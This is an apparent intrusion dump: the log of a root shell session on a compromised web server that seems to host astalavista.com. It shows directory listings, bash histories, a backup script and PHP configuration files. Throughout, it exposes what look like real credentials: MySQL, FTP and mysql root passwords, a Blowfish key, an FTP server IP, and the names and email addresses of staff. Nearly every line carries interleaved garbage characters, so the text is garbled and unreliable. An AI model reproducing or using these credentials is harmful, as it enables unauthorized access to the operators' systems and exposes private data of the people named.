sh-3.2# cat /etc/motd, K4 F' s: O' ]2 E. Z. Q; O( i7 z
#####################################################
% h% C: y# V* R U#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
2 `; {2 k% Y3 c1 n1 ^* k! J O1 e7 H- e: W1 e# |__| [__ | |__| | |__| | | | [__ | |__| #* S- G" ?, p2 X6 d0 [+ `+ u
# | | ___] | | | |___ | | \/ | ___] | | | #
& S* C) X( Z$ n7 C" P: R# #- J0 m W, N! Y; C, B6 R
#####################################################( J8 t) \% V/ W5 `% f, a
# #. ~* |: I% T& e' {% B$ Y" d
# Admin Contact - 链接标记support@secureservertech.com #' p( O" O$ j1 f8 D
# #. k$ K! [ E7 t2 Y2 [
# Available ShortCuts #$ b' l& d$ U1 o7 r/ j$ J
# #
" l# P( [! L4 A- v# nst - list active connections #% y0 x+ ~3 O, }9 [; ]# |
# ddos - shows how many times each ip is connected #/ v* |8 q* x R$ X W
# ltr - restart the webserver #1 F4 B% }3 [/ B5 s. Z/ t
# phpc - edit the php config file #
/ M4 [: S6 `; c, i, C: M# htc - edit the webserver configuration file #) c! D% x2 Z+ ?- w! l
# up - uptime # [" A$ [; q1 q+ p5 J! C
# etd - edit the motd of the day file #2 m) N" i) k9 r: q+ F9 M$ e
# htr - start and restart apache if needed #
2 ^' m+ f/ D- w3 ^" z9 w3 A# syng - shows active SYN_RECV connections #
8 f j+ e7 m/ e. k# synd - syn flood blocker - “synd -h” for usage #
( a) P. q5 K1 R. }1 l* X+ w#####################################################& f9 A9 L+ M) b2 F
# NOTES: #' |9 U- f$ Y# J, w7 w% {6 e
# Last Upgrade - 12-08-2008 by JF #4 I/ D* U$ E$ g1 t2 J
# My.cnf/Mysql Optimization - 1-28-09 #9 r, I* U) Q% s
# #0 `& ~9 D* Y# W1 A
# #2 q- u; d8 t; B( C/ }4 b
# #+ Z, a2 k+ K8 ?( I! @8 v
#####################################################
8 p- a y; U$ e4 M, f" M) ]. p4 W9 d6 y+ d3 D# w8 B
sh-3.2# lastlog | grep -v Never
# c, S& r! B6 e+ t( pUsername Port From Latest
& l3 c; h3 o6 E& V3 S, Wroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
3 ^7 L+ e: K$ Nadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008; N& d2 K& ^5 W
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
% H" _ {$ [ zastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009) Y# D! U1 t- p& O& P3 U. |
Q6 j" m. \7 {3 V/ n
sh-3.2# ls -la
8 N' g" u& |0 G$ ?) _, N$ @# Wtotal 453376
6 h6 W _5 k3 w4 G5 @drwxr-x— 15 root root 4096 Jun 4 08:40 .
2 s: H% k6 ?0 ?# kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..; a9 }! W. z% V: V9 u
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
" W2 E6 ?( x/ ^-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
/ P2 R, |4 h+ x7 R- u1 |-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
# ?) |( b5 R' M( f$ v, J-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout8 i0 y0 k, Y- ^# |0 W5 [
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile& s/ ^7 @5 T% U) C( j5 u
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
' ]8 k2 W( o9 n: R Z) o-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
$ }) @2 y8 a9 D+ R, T2 v3 e-rw-r–r– 1 root root 1327 Nov 29 2007 cert4 Z w9 r" H: g1 w
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
& W) Q8 h7 x) {8 @4 L* c& f' Pdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
5 j1 F; K b# |* e-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc& t* f1 ^7 e# w
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql3 m5 C) j* z3 N' l* N! o! M
drwx—— 2 root root 4096 Oct 28 2007 .elinks
$ B2 i9 F; E- d# y) C; hdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.19 d8 x, Q& S* m4 {) }
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
" m8 z: V- Z1 } k) D9 F/ u-rw——- 1 root root 0 Apr 16 13:19 .history
$ S% w! W+ J/ ~" N-rw-r–r– 1 root root 16095 Sep 11 2007 install.log; Z9 f- I+ W1 Y( l; u% x- H
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog3 l1 t1 R E; }8 J3 N! W
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh. d+ u: H4 x" I
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
+ [2 R! x9 j8 c# D- o& q) Tdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
% K- X6 ]& I5 h8 @( t5 ]% Mdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
& p, l2 W) y" I-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
8 g" R2 q5 h. q; [& }) f9 j5 C-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2" B+ ~1 X7 F- T$ C
-rwx—— 1 root root 760 Sep 18 2008 lp" h+ L2 o' X, [$ M9 y2 E' T
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1* H5 c1 H6 T' I( G# W' C2 o
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz5 O/ F8 M: T: l9 T* g
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
/ Y2 J! @' H& u9 Fdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9: M! u9 v# G' I5 F
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
( `6 g# ?8 M, b: H8 J/ Sdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
3 u. d8 K( f2 O$ u8 ^% ^& M-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
- \- o+ P. w- `7 v-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh' I6 _# ]3 I+ B+ M2 t- n/ B1 Z
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
& a u, C- M# w9 d/ @& P. L-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history% _$ `+ `- I4 J) t
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport) s% n/ n6 v6 K( e4 P. O
-rw——- 1 root root 41 May 20 2008 .mytop1 U) h0 R v# N5 N2 h N
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
j; ~7 N4 c2 ~+ m. ]) V M-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
3 b/ n# e( Y* O9 t2 Q8 k9 J8 Udrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp5 o: R6 i8 D5 A8 ~
-rw——- 1 root root 1462 Sep 21 2007 opt.php
4 u9 C9 ]9 g0 C! R( W# \ O-rw-r–r– 1 root root 3371 Sep 22 2007 p
j0 z: y! D q! h2 ~+ ^-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
8 j0 K* E5 f3 O1 Z/ U) W-rw——- 1 root root 1024 Feb 3 21:32 .rnd
* u% k9 M- Z" ^+ `+ R/ o-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
) s8 a* k3 S- O& ?-rw-r–r– 1 root root 887 Nov 28 2007 server.key$ N* a* Z7 W+ ^ Z V
drwx—— 2 root root 4096 Oct 10 2008 .ssh
+ d& T( y; z2 L. r# i8 Y-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat9 B! R1 W& A3 I; O9 h( F
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc+ s) F. \0 H9 Z: F. V' e4 i! ~. @
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip: t: t1 s6 @, @3 h1 \& E8 D
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1; ^' |; O4 I: n/ j) ]
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
2 E' w+ e3 X# s' z+ H-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
6 {9 m1 Q. }$ z5 edrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
" i& t t" w/ t T4 A3 ?0 g' c-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz21 l3 o7 V! n( C
-rw——- 1 root root 12997 May 16 2008 .viminfo
# W o' q2 ~4 |0 T5 q& |' M2 B$ O& c# M- ]5 k0 ?
sh-3.2# cat .bash_history
* w0 D% l% @/ u! p5 F[snip]0 |2 R+ f" {" M9 n
wget cp4sst.com/sstlinux.tar.gz5 |) ]2 d7 g% i& U
tar zxvf sstlinux.tar.gz2 P! {( R! r9 L0 Y; {% @
cd linux-2.6.27.10, q5 c+ _* J7 H
sh install.sh
+ d* R% L; b1 T4 y \* Q& T) Gmake bzImage ; make modules ; make modules_install ; make install( \) f0 t" p- x3 L0 [+ e
make clean! l; c8 B% z) X4 `
service mysqld restart
& V) w( m, d+ u% J* u# A* `[snip]3 |3 d9 S( b# H3 I/ }* \
cd /usr/sbin/
- {' r% [; ~+ A: W, gchmod 4777 traceroute7 m1 k1 y7 W6 K& O# z1 s: R
chmod 4777 ping
& z# W4 C* B2 a3 Y+ X8 p( j5 otraceroute -I 链接标记[url]www.astalavista.ch[/url]
0 w6 h% n- l+ K0 a" E% I1 I8 [+ _[snip]4 t, k) n' A4 R, J0 w8 d4 @
vi /etc/csf/csf.conf$ L" Z5 q7 v& ^" }% O9 o7 z2 p
traceroute google.ch
& G. w [2 P; l V3 B2 F7 u z( v, tservice csf restart
- X. R0 z: ~9 Z. htracert google.ch3 w, H* H: I' q
service csf restart- J% w8 X9 T0 T4 I
traceroute 链接标记[url]www.google.ch[/url]
7 `8 Q; _1 M9 b7 K4 K% k" ]. k4 `tracert 链接标记[url]www.google.ch[/url]
" s" F; r9 ~4 F- x$ j* H0 c! ?traceroute 链接标记[url]www.google.ch[/url], @3 Q3 ]9 s, p; n# F3 ]
locate traceroute
7 B) A/ K, D) B+ _' n, | Lchown 4755 /bin/traceroute
/ O) `* k! p- A! H" Mchown 4777 /bin/traceroute; ] L$ u) v* R; z: I# e5 Y
locate ping2 D A) n% c" Z) H2 e0 ?5 g: b2 J
chown 4755 /bin/ping
- Y( a W0 u# ]' K/ q5 _chown 4777 /bin/ping
$ i+ {6 F6 Y$ C& W0 F: f' l4 X& [( Vcd /bin/
8 \/ p8 `) }. H/ v! Bls -ali | grep ping
! a6 a- j; b4 h8 |4 Q4 r+ W+ ~chown root ping
4 [; ~" ]' D; ^. Hchmod 4755 ping
/ k2 f6 w) U4 k F9 ^$ s) @( F% G9 ~ls -ali | grep traceroute
9 N8 U# z2 J7 h' Ochown root traceroute
3 |5 g* u) t- C8 V8 d# mchmod 4755 traceroute2 r' g. W* S6 g- B
ls -ali | grep traceroute
" L' t5 a7 N2 H# Q2 ]# [traceroute -I 链接标记[url]www.google.ch[/url]$ r5 D. Q2 s! E4 z- t' m$ \% u
traceroute 链接标记[url]www.google.ch[/url]
( V) `; y8 C7 J1 F7 Cwhois pmsantos.ch: ]* v5 ?+ o1 ^
[snip]0 w1 |3 d; n0 b$ u
mysql -h com_contrexx2_live < /root/defaultp_ports.sql0 T6 h! q3 i) s6 s7 p
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
& h7 D( k: S% P: y& ~6 vmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
) P& N; p$ O8 g2 Jmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
- K& n# Z* A3 z" L5 Ztop+ Y$ N$ F1 V+ i6 B; ]
ping ssth.ch, i9 I" L8 ^/ u! _
ping asdlkfaljgasd???ljg???lasj.ch
9 |* J& ~' `1 F+ B. |ping asdlkfaljgasdlasj.ch: Z( l" i8 l) N" I% e$ `
ping 链接标记[url]www.ssth.ch[/url]
4 ]8 R! q: R' y, r+ Rping ssth.ch
/ K! D1 Z, d: Cnslookup 链接标记[url]www.google.ch[/url]
$ }4 d/ F4 u2 W4 C% tnslookup 链接标记[url]www.ssth.ch[/url]! K3 ^7 m( T' q+ A' f% S0 X
man nslookup* d8 F6 |$ X* `4 ^
ping 链接标记[url]www.google.ch[/url]
0 w1 `0 f% d9 F$ Dnslookup 链接标记[url]www.google.ch[/url]+ T3 a# n' @( i* P6 i; Z, ?, F8 D Z
nslookup 链接标记[url]www.google.ch[/url]
# C6 B- {1 s1 J0 l) ^- Gnslookup salfjasdlf.ch& x1 s/ G( ~# ^0 x4 } ^- m, [
[snip]' J1 ]3 g$ v' x* J
openssl passwd -1 sadf
+ ^* C8 q3 M9 L: |# @4 Copenssl passwd -1 5cZNHstdTy
1 q( W% Q* {7 w% C H9 u* M4 `* jmysql
; t; P: o7 X& P4 Ymysql
0 Q5 j& e9 z+ Mlocate proftp
" P% a9 `% K9 h bvi /etc/proftpd.passwd0 m: {1 r( |5 L* E0 a
service proftpd restart1 ]6 x% |+ D, m2 u% v
locate proftpd.conf/ Q6 W" L) X" Y$ y; q
vi /etc/proftpd.conf, j/ Q+ U4 T9 s2 q4 O0 X* j/ r5 k
vi /etc/proftpd.passwd2 o, e* b0 V6 i2 H3 D2 V8 D9 _
service proftpd restart, M* S, C, P5 @9 y
[snip]
5 }8 ]/ U' G2 s# J0 ~4 n- W/bin/sh /home/com/backup_system/backup.sh1 p; F! y; x0 ~/ _2 E
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin" q0 G6 x0 [9 z# J
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql* b- S0 ^9 s1 ] Y( C L4 M
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql6 d% e' U; }* u9 P$ q. Q' e/ x |
ls -ali
8 b& e3 b4 `) O" A2 ^6 G! Z7 imysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
c8 _. y; l# I: N0 E/ }& gmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
5 |- {9 `6 g# U+ o6 g' F5 Xcrontab -l
9 J Z+ F/ I7 ^- Tcrontab -l
2 D$ t8 W) p9 C" ]+ Z2 v4 B* \. G% [php -q /home/com/public_html/modifications/cronjobs/securitynews.php5 s% b3 ^7 s- q
/home/com/public_html/modifications/cronjobs/exploits.sh! j, K* e0 j: V* |) L6 u
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]0 i# \% Z" U% u3 G
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz1 f2 _* e0 ]! t8 k. k8 u0 f+ z
cd lsws-4.0.34 m$ x0 |- c* e J% z* C; D
sh install.sh
: M2 N! i. r3 X: r: P5 Yuptime% M* _# [. K5 c
hdparm -tt /dev/sda
8 A2 _. x7 M5 ^; |, Q" ]4 c' hiostat
. T" E* I+ D# G7 d8 Zyum install iostat& C5 g* i9 y. T; O+ P+ f4 ?
iostat3 q) A2 s; K$ O4 m* `, J
whereis iostat
8 o1 L0 L1 f3 \- O) Pyjm clean all6 G. G j' A. n: X" h) r9 T
yum clean all ; yum -y update$ n2 d. G0 q+ }: C3 R8 j5 j: n! O- m
iostat0 T. z% R# p) i' |# n
yum install systat
. _. K' ~" K3 ?4 w9 e( Erpm -qa | grep iostat4 P& ~' b" t5 b+ D8 N
rpm -qa | grep sysstat
7 `1 t" x% G. v: Krpm -qa | grep systat; L. H# N- ?7 D9 W$ g8 G
dmesg -c+ d+ M9 z4 ^. `3 v
sysctl -p) Z3 L% _, D3 ^( U+ K# [9 m8 o
uname -r5 B* K/ R- a; a' B* g5 n! K) c; `2 Q
cd /usr/src
8 V) d" }9 f2 Y) n3 b l+ B0 Gwget nix101.com/kernels/sstlinux.tar.gz: b& S v+ b+ L" s) }
shutdown -r now
) |0 r! F* o# k6 K7 Z4 Anano -w /boot/grub/grub.conf% d. m& F+ p1 }* Z. s; _. `& d3 t1 ~* S
6 E/ Q B( M3 v
sh-3.2# cat .my.cnf
. Y+ e6 \+ Y9 O/ \/ p2 I7 N# b! K[client]
6 z# X' R5 o' G0 Suser=da_admin
3 E7 D. B6 Q3 I- v9 M/ {password=X9dctmRH2 R. S) ?. v/ w5 o7 \
1 x8 G; c! X# u) }$ w6 Y
sh-3.2# cat /home/com/backup_system/backup.sh0 x7 U5 v$ t5 Y+ R- O' w6 O: i, C$ f
#!/bin/sh
! x) ^2 ]; R' [#####################################################################: V- s' Y4 c) i: e8 o
# #4 e: i: {$ s0 C" E+ S. K
# incremental backup for astalavista.com #
& i X0 O+ z8 T; k2 p; u% p1 C d# #
4 J: r0 O4 f0 t) k/ V- e: \( Q# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
! z; V3 N# M8 P3 I4 i# #
3 N8 c3 _1 c! Y) [7 L. E8 s. w#####################################################################( p3 E5 A6 P1 X2 M' \$ w v
[snip]
( e; _8 M+ J `3 aPROG_DIR=”/home/com/backup_system”;5 }2 F, ], c- X# ]% A" w
BACKUP_DIR=”/home/com/backups”;- E. V1 B8 y* d5 t+ K, i: ~
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;" s) R, }" v v& i) t( D# ]9 y Y
# ftp for synology backup server" I7 y: v. s9 ?' Z) A* o% K
FTP_HOST=”212.254.194.163″;7 r7 A4 w5 W! z9 m5 G
FTP_PORT=”21″;; e9 U1 d9 ^2 E/ h m! ]3 F; ~
FTP_USER=”astalavista.com”;9 v1 ?0 m+ R/ D# R3 ^6 q
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
) {2 C/ D, f1 B- E0 v( O mFTP_DIR=”/astalavista.com”;. D4 b- C& u. r
# database1 L% j4 [8 h% J6 r2 j4 U
DB_HOST=”localhost”;' A( L/ q5 q. _" {
DB_USER=”contrexxuser2″;
9 ?3 `" G; h: [3 ADB_PASS=”0fEYNZgXz1pKe”;; y/ i: I5 {! K- o
DB_DATABASE1=”com_contrexx2_live”;
: ~. ]" C# d+ d- E; WDB_DATABASE2=”com_contrexx2″;+ O; x" o | k: w( h
[snip]
1 x* h$ c- @$ w Qftp -in $FTP_HOST $FTP_PORT <<EOF
- P6 ?( h2 k9 z4 t$ b( j& {quote USER $FTP_USER
4 j3 T3 F+ c4 Iquote PASS $FTP_PASS" V& `( o" D! O. B4 c' l
cd $FTP_DIR
5 `+ z5 u! K3 S* r" Lput $DB_FULLNAME-SQL_Dump.tar7 E7 N, p+ h' z5 s
put $BACKUP_FULLNAME-Public_HTML.tar
. `) ^/ B0 d% F" nclose
8 l8 u: _7 M/ u0 abye
0 L8 C( x r# B) J, U" [! vEOF0 ^4 U8 `% y. O- @0 e+ _, |3 I
8 v0 Z/ g: r; i, B8 T$ x5 }sh-3.2# cd /home
" g& Q% Y, Z/ b/ u$ Q- z6 w# ?: jsh-3.2# ls -la
% L/ z" U- l2 x7 E, stotal 1205 P% l5 A" w$ r, ~, S
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .+ C( d4 _6 e" M; `. s7 y4 R& \4 P
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 `! [9 f; E+ U; U6 O
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin! |5 o3 [) B: n! q( Y
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group0 X) n' p8 l7 R' ~- T: Y
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
4 i( y1 s1 |0 S, K7 |! ldrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet* x% V! M/ N" o9 c1 J3 ^- H
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
7 S% U0 X8 h/ c1 {3 |drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 P- p- [5 y( {4 q% ]
drwx–x–x 10 com com 4096 Apr 28 12:40 com
5 Y! i- k0 C9 z+ J' n/ i& @$ Pdrwxr-xr-x 2 root root 4096 May 17 2007 ftp& X" [, a! |5 a! b* ^8 _* P! ~
drwx—— 3 jon jon 4096 Sep 21 2007 jon
, J: l. U! L) Q6 K# t0 Fdrwx—— 2 root root 16384 Sep 11 2007 lost+found b( G5 `6 z# Z5 \; h
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
, y9 p' J! x+ Z# r% J6 L( ~; }drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
" Y% p& g: g6 v# ~' Tdrwx—— 2 jon jon 4096 Sep 15 2007 test- W( |7 y D" f$ ~3 [
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp) T. l) v% K/ i+ O
, _) S- q2 E7 [0 {/ x; L+ Jsh-3.2# cd admin
( J# i; t% e9 D) P2 {* P ksh-3.2# ls -la9 T8 A: U% {0 W5 N7 y* K9 p6 O" N
total 1735896
$ _6 e/ ~; L' Fdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
5 s' Z6 I0 Y' ~* [2 i( X/ i0 b0 Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ y. E, h5 Z' O7 R
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
+ T l; X! u2 S- Wdrwx—— 2 admin admin 4096 Sep 28 2007 backups
% I2 ?* D+ @8 u! d! y6 m2 w-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
2 k* u: O Z: y" D-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
, |. g3 C8 H1 ~; a% K4 z, Y-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
; ~8 G4 T( {& M* }+ Q8 a" o( b-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc& t1 p e, r* p# D" {% P! e3 T
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups7 G! k* |$ e, q& b$ v4 H
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
6 T* a; Q3 H/ ]drwxrwx— 3 admin mail 4096 Sep 21 2007 imap% w) x) m1 x! w
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
$ B' D/ M' T$ o. B6 u- j+ bdrwx—— 2 admin admin 4096 Sep 21 2007 mail
# w5 Y. T/ J! F! _2 R-rw-r–r– 1 root root 716 Nov 28 2007 server.csr3 {1 Y0 x7 R& Z! N6 m
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
0 T/ `- r2 h1 v; [2 ?" M$ X-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow0 ^7 S9 W! j' D
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
+ R/ O1 {3 I& g3 ]2 Y# qdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups+ }( ?. j( @9 |4 G0 V6 b
4 p0 M6 g) E- G3 b# osh-3.2# ..& r) s. t- M7 ?% g- ^0 n
sh-3.2# cd jon! i: X8 X; ]( @0 U' ]9 e
sh-3.2# ls -la" J4 m+ W# g" V) o& `; Q
total 36
& B2 ?9 J% U. [0 M* `/ udrwx—— 3 jon jon 4096 Sep 21 2007 .
; A9 @' e% T* {8 B4 edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& g+ h( D& D9 c-rw——- 1 jon jon 53 Sep 21 2007 .bash_history' `" }+ r3 q+ l9 d) H6 m1 W+ N6 c
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout1 e' ~, Y. \$ A1 o
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
9 D, i+ G: H# c% U# h* j-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
1 ^8 v2 r1 B2 u- V/ b( ]-rw-r–r– 1 root root 24 Sep 21 2007 info.php& G0 w6 P! `. {3 L8 l; U) k2 a
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html T% r, R8 e: [) h" v! }4 \' Q, E- D
) Z# N2 t, s+ B& Y- W% d: ush-3.2# cd ..
4 L/ X* b4 s+ @8 `2 J, l/ osh-3.2# cd test
0 Y$ z# f8 X t4 Ash-3.2# ls -la: h2 y$ N# d; j. e3 O/ c
total 48
7 a! a9 f- a6 J2 y3 F+ wdrwx—— 2 jon jon 4096 Sep 15 2007 .
" C: ~9 Z2 c9 O" Fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..- }2 S6 P7 R# l; b, [
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
/ c9 D3 `& n; s8 W4 _-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout% {/ t8 t7 D% O' W& q9 B
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
- o9 w q( h2 r6 y* P, K+ v' k+ T-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
) P5 m3 q2 u& J9 I0 W) tsh-3.2# cat .bash_history
. k* Q; a' h4 ]; n/usr/bin/mysqladmin -u root password PoliuJhytg67
" v" a/ h" w( g( O9 ^7 B- F, e
) S) I/ \1 m8 G/ ush-3.2# cd ..( |; Y9 b0 J8 o/ K' S7 b- s
sh-3.2# cd astanet; t" i. O m$ F, Y- P! V: {
sh-3.2# ls -la; w# I/ h6 V& F. Y9 F- x+ y
total 52
, g$ [9 d( \% O8 s8 A$ [# n2 ?) F- `drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
' b0 C$ f: v! v4 ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
z' X4 Z9 x# C% I- f% jdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth3 \; S2 E; _% _9 @
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history) U( f8 r- j5 _* A! [
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
$ I3 r( D- o3 Y) D) ]& H-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile/ `# u+ O2 O+ q# R L+ B3 H3 T
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc- E& W- |9 P1 V
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
) w. {' V! J" j* c9 u6 m$ h. J' Xdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
" V: L2 A! s! zdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail7 E' {* S5 w! z. N, ?6 @
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history- C9 p! g0 |- E( |( i/ A* f$ ^
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
$ k; D9 l: p8 n-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
) P! N+ G9 e+ ?9 B* p( W2 c" ]/ K# {3 p6 ~$ r3 H
sh-3.2# cd auth/
. h/ m/ p; Y" W% w& L- psh-3.2# ls -la* K6 [! J1 `6 z; b. T) q
total 28. o2 |: ?7 n. }! y
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
% A. q$ T" u! ?! F$ u. [' @7 mdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
* i$ u/ I9 T+ E' D" E-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
2 _# Q2 h5 P& L& ~ P-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
! \, T7 Z2 v5 ]9 @% J& S6 a& \-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
% [$ L' h3 X4 T& V# w-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
* p: Y; B& T1 g, w3 a4 U-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
, W; @& Q1 Z% `
+ K( B5 R3 a" o. `sh-3.2# cat hackercontest.config.inc.php8 s! _* w' a: a! U" L
<?PHP9 W1 M. N( x2 v! o S
// Variabeln f?r Verbindung zur Datenbank //
! W5 z' i! H( X: ]8 ]1 h$conxHost = ‘localhost’; // MySQL hostname* n+ I+ A( \. W8 L9 l1 U& o
$conxUser = ‘hackercontest’; // MySQL user7 _) M k" J8 H$ c+ [! w0 c
$conxPassword = ‘K6m@7dUc’; // MySQL password4 W% o+ U A( ?" b' p8 H
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish4 b0 D+ R% Y% `3 y
?>; d; g+ I1 [% r$ _7 ^- ?% Z6 H
sh-3.2# cat hosting.config.inc.php
) r- |6 G8 Q. i1 [! Q- b<?PHP
5 L( [0 x: F. O// Variabeln f?r Verbindung zur Datenbank //! \7 e0 t# c/ h+ I
$conxHost = ‘localhost’; // MySQL hostname4 J4 M/ B3 l% A8 ], j- k/ ^
$conxUser = ‘hostinguser’; // MySQL user
' @& O/ I5 s( T* W% i$conxPassword = ‘cXvB3981′; // MySQL password
$ w5 j( x" m s1 [. O4 |* N$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
( s3 ?, H# Z' N4 ~7 ^# h?>: A/ x5 u9 y) E j
( O, K- H# P5 _# ^; @) l
sh-3.2# cd ..
8 N P% M) z: G `' R! p+ \sh-3.2# cd com# w$ l( g, M/ P1 c
